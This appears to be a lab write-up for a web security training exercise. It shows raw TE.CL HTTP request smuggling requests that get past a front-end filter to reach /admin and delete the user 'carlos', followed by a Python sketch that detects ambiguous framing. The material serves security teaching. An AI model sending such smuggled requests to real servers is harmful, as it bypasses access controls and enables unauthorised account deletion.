07 - Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

As we have seen in other labs, this returns a 404:

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
67\r\n
POST /notFound HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n

We use the same technique to bypass the filters:

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
75\r\n
POST /admin HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: localhost\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n

The lab is solved like this:

POST / HTTP/1.1\r\n
Host: 0ac8003a04f0266b808d586300b700f8.web-security-academy.net\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Transfer-Encoding: chunked\r\n
Content-Length: 4\r\n
\r\n
8c\r\n
POST /admin/delete?username=carlos HTTP/1.1\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Host: localhost\r\n
Content-Length: 15\r\n
\r\n
foo=bar\r\n
0\r\n
\r\n
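
Added example (not part of the original write-up): the sketch below frames the first request above the way a front end honouring Transfer-Encoding and a back end honouring Content-Length each would, and flags requests that carry both headers. The Host value and all function names are assumptions made for this illustration.

```python
CRLF = b"\r\n"

def split_head(raw):
    """Return (headers keyed by lower-cased name, bytes after the blank line)."""
    head, _, rest = raw.partition(CRLF + CRLF)
    headers = {}
    for line in head.split(CRLF)[1:]:              # skip the request line
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return headers, rest

def is_ambiguous(raw):
    """True when both framing headers are present; RFC 7230 section 3.3.3
    says such a message ought to be handled as an error."""
    headers, _ = split_head(raw)
    return b"transfer-encoding" in headers and b"content-length" in headers

def frame_chunked(raw):
    """Body and leftover bytes as a Transfer-Encoding: chunked parser sees them."""
    _, rest = split_head(raw)
    body = b""
    while True:
        size_line, _, rest = rest.partition(CRLF)
        size = int(size_line.split(b";")[0], 16)   # hex size, extensions ignored
        if size == 0:
            return body, rest[len(CRLF):]          # final CRLF; trailers not handled
        body += rest[:size]
        rest = rest[size + len(CRLF):]

def frame_content_length(raw):
    """Body and leftover bytes as a Content-Length parser sees them."""
    headers, rest = split_head(raw)
    n = int(headers[b"content-length"])
    return rest[:n], rest[n:]

# Constructed sample modelled on the first request above; Host is a placeholder.
INNER = (b"POST /notFound HTTP/1.1\r\n"
         b"Content-Type: application/x-www-form-urlencoded\r\n"
         b"Content-Length: 15\r\n\r\n"
         b"foo=bar")
SAMPLE = (b"POST / HTTP/1.1\r\nHost: front-end.example\r\n"
          b"Content-Type: application/x-www-form-urlencoded\r\n"
          b"Transfer-Encoding: chunked\r\nContent-Length: 4\r\n\r\n"
          b"67\r\n" + INNER + b"\r\n0\r\n\r\n")

if __name__ == "__main__":
    print("ambiguous framing:", is_ambiguous(SAMPLE))
    print("chunked view     :", frame_chunked(SAMPLE))
    print("length view      :", frame_content_length(SAMPLE))
```

The chunked view consumes the whole stream as one body of 0x67 bytes, while the Content-Length view stops after `67\r\n` and leaves the rest on the connection, which is why a front end should reject or normalise any request for which `is_ambiguous` is true.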